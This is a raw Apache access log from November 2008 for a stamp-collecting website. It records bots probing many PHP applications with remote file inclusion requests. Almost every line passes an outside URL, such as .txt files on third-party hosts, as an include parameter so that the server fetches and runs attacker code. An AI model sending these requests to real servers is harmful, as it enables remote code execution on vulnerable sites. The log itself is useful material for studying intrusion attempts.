69.89.31.108 - - [16/Nov/2008:18:01:15 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
70.38.54.118 - - [16/Nov/2008:18:01:55 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
70.38.54.118 - - [16/Nov/2008:18:05:20 -0800] "GET /kboard/kboard.php?board=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.mathstamps.com"
70.38.54.118 - - [16/Nov/2008:18:05:20 -0800] "GET /logs/access.log//kboard/kboard.php?board=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.mathstamps.com"
70.38.54.118 - - [16/Nov/2008:18:05:20 -0800] "GET /logs//kboard/kboard.php?board=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.mathstamps.com"
208.69.123.58 - - [16/Nov/2008:18:05:40 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.69.123.58 - - [16/Nov/2008:18:05:40 -0800] "GET /logs/access_080414.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.69.123.58 - - [16/Nov/2008:18:05:40 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.69.123.58 - - [16/Nov/2008:18:06:05 -0800] "GET /logs/access_080804.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:06:31 -0800] "GET /logs/access.log//kboard/kboard.php?board=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:06:31 -0800] "GET /logs//kboard/kboard.php?board=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:06:31 -0800] "GET /kboard/kboard.php?board=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:18:09:17 -0800] "GET /logs/access_080428.log//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:18:09:17 -0800] "GET /logs//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:18:09:17 -0800] "GET /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:11:42 -0800] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:11:43 -0800] "GET /ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:11:43 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:11:43 -0800] "GET /logs/access_080421.log//ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
78.31.64.178 - - [16/Nov/2008:18:12:03 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.67.23.90 - - [16/Nov/2008:18:12:18 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.20.101 - - [16/Nov/2008:18:12:19 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:12:54 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:12:54 -0800] "GET /ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:12:58 -0800] "GET /ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
91.103.204.230 - - [16/Nov/2008:18:13:14 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
217.148.95.133 - - [16/Nov/2008:18:13:44 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.goboyntonbeach.com/images/response??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
217.148.95.133 - - [16/Nov/2008:18:13:44 -0800] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.goboyntonbeach.com/images/response??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:16:20 -0800] "GET /logs/access_080414.log//convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:16:25 -0800] "GET /convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:16:26 -0800] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.18.162.8 - - [16/Nov/2008:18:16:47 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.38.54.118 - - [16/Nov/2008:18:17:50 -0800] "GET /logs/access_080825.log//admin/spaw/spaw_control.class.php?spaw_root=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.mathstamps.com"
70.38.54.118 - - [16/Nov/2008:18:17:50 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.mathstamps.com"
70.38.54.118 - - [16/Nov/2008:18:17:50 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.mathstamps.com"
78.31.64.178 - - [16/Nov/2008:18:18:04 -0800] "GET /logs/access.log//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
78.31.64.178 - - [16/Nov/2008:18:18:04 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.mathstamps.com"
78.31.64.178 - - [16/Nov/2008:18:18:04 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 5090 "-" "libwww-perl/5.805" "www.mathstamps.com"
91.103.204.230 - - [16/Nov/2008:18:19:44 -0800] "GET /logs/access.log//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
91.103.204.230 - - [16/Nov/2008:18:19:45 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
91.103.204.230 - - [16/Nov/2008:18:19:45 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 5090 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:20:09 -0800] "GET /logs/access_080825.log//admin/spaw/spaw_control.class.php?spaw_root=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:20:09 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:20:09 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
77.221.130.15 - - [16/Nov/2008:18:23:15 -0800] "GET /logs/access.log/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.130.15 - - [16/Nov/2008:18:23:16 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.130.15 - - [16/Nov/2008:18:23:16 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.130.15 - - [16/Nov/2008:18:24:05 -0800] "GET /logs/access.log/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.130.15 - - [16/Nov/2008:18:24:06 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.221.130.15 - - [16/Nov/2008:18:24:06 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.18.162.8 - - [16/Nov/2008:18:24:34 -0800] "GET /logs/access.log//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.18.162.8 - - [16/Nov/2008:18:24:35 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.18.162.8 - - [16/Nov/2008:18:24:35 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 5090 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.67.21.107 - - [16/Nov/2008:18:25:40 -0800] "GET /ashnews.php?pathtoashnews=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.21.107 - - [16/Nov/2008:18:25:40 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.21.107 - - [16/Nov/2008:18:25:40 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
83.222.4.51 - - [16/Nov/2008:18:26:04 -0800] "GET /logs/access.log/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
83.222.4.51 - - [16/Nov/2008:18:26:04 -0800] "GET /logs/access.log/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
83.222.4.51 - - [16/Nov/2008:18:26:05 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
83.222.4.51 - - [16/Nov/2008:18:26:05 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
83.222.4.51 - - [16/Nov/2008:18:26:05 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
83.222.4.51 - - [16/Nov/2008:18:26:05 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
80.67.23.90 - - [16/Nov/2008:18:26:18 -0800] "GET /logs/access.log//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.23.90 - - [16/Nov/2008:18:26:18 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.23.90 - - [16/Nov/2008:18:26:18 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 5090 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.21.107 - - [16/Nov/2008:18:26:28 -0800] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.21.107 - - [16/Nov/2008:18:26:33 -0800] "GET /logs/access_080421.log//ashnews.php?pathtoashnews=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
141.89.66.2 - - [16/Nov/2008:18:27:07 -0800] "GET /logs///?_zb_path=http://www.valletierra.com/demo/l333tbi1tX.txt???? HTTP/1.1" 200 5091 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.mathstamps.com"
141.89.66.2 - - [16/Nov/2008:18:27:07 -0800] "GET //?_zb_path=http://www.valletierra.com/demo/l333tbi1tX.txt???? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.mathstamps.com"
141.89.66.2 - - [16/Nov/2008:18:27:07 -0800] "GET /logs/access_080915.log///?_zb_path=http://www.valletierra.com/demo/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.mathstamps.com"
80.67.20.101 - - [16/Nov/2008:18:27:36 -0800] "GET /logs/access.log//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.20.101 - - [16/Nov/2008:18:27:36 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.20.101 - - [16/Nov/2008:18:27:37 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 5090 "-" "libwww-perl/5.808" "www.mathstamps.com"
222.122.52.79 - - [16/Nov/2008:18:28:09 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.67.21.107 - - [16/Nov/2008:18:32:43 -0800] "GET /logs/access_080428.log//newspublish/include.php?path%5Bdocroot%5D=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.21.107 - - [16/Nov/2008:18:32:43 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.21.107 - - [16/Nov/2008:18:32:43 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.21.107 - - [16/Nov/2008:18:32:46 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:35:03 -0800] "GET /logs/access.log/errors.php?error=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:35:08 -0800] "GET /logs/errors.php?error=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:36:01 -0800] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:36:01 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:37:13 -0800] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:37:13 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:37:14 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:18:37:23 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:18:37:23 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:18:37:23 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.172.57.245 - - [16/Nov/2008:18:37:24 -0800] "GET /logs/access.log/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.172.57.245 - - [16/Nov/2008:18:37:24 -0800] "GET /errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.172.57.245 - - [16/Nov/2008:18:37:25 -0800] "GET /logs/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.55.139.190 - - [16/Nov/2008:18:37:28 -0800] "GET /logs/access_080428.log/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:39:18 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:39:46 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:39:47 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:39:47 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:42:22 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:42:34 -0800] "GET /lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
84.21.71.133 - - [16/Nov/2008:18:42:34 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.172.57.245 - - [16/Nov/2008:18:42:51 -0800] "GET /logs/access_080428.log/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.149.242 - - [16/Nov/2008:18:44:10 -0800] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.mathstamps.com"
58.227.192.80 - - [16/Nov/2008:18:47:05 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
58.227.192.80 - - [16/Nov/2008:18:47:05 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
58.227.192.80 - - [16/Nov/2008:18:47:05 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
222.122.52.79 - - [16/Nov/2008:18:48:19 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.186.1.54 - - [16/Nov/2008:18:49:03 -0800] "GET /logs/access.log/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
89.186.1.54 - - [16/Nov/2008:18:49:03 -0800] "GET /errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
89.186.1.54 - - [16/Nov/2008:18:49:04 -0800] "GET /logs/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
89.218.85.18 - - [16/Nov/2008:18:50:14 -0800] "GET /logs/access_080428.log/default.php?page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [16/Nov/2008:18:50:14 -0800] "GET /default.php?page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.218.85.18 - - [16/Nov/2008:18:50:14 -0800] "GET /logs/default.php?page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
38.98.60.188 - - [16/Nov/2008:18:51:37 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
38.98.60.188 - - [16/Nov/2008:18:51:37 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
38.98.60.188 - - [16/Nov/2008:18:51:37 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
222.122.52.79 - - [16/Nov/2008:18:51:55 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
222.122.52.79 - - [16/Nov/2008:18:51:55 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
222.122.52.79 - - [16/Nov/2008:18:51:56 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.221.130.15 - - [16/Nov/2008:18:53:02 -0800] "GET /logs/access_080714.log/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
58.227.192.80 - - [16/Nov/2008:18:53:26 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
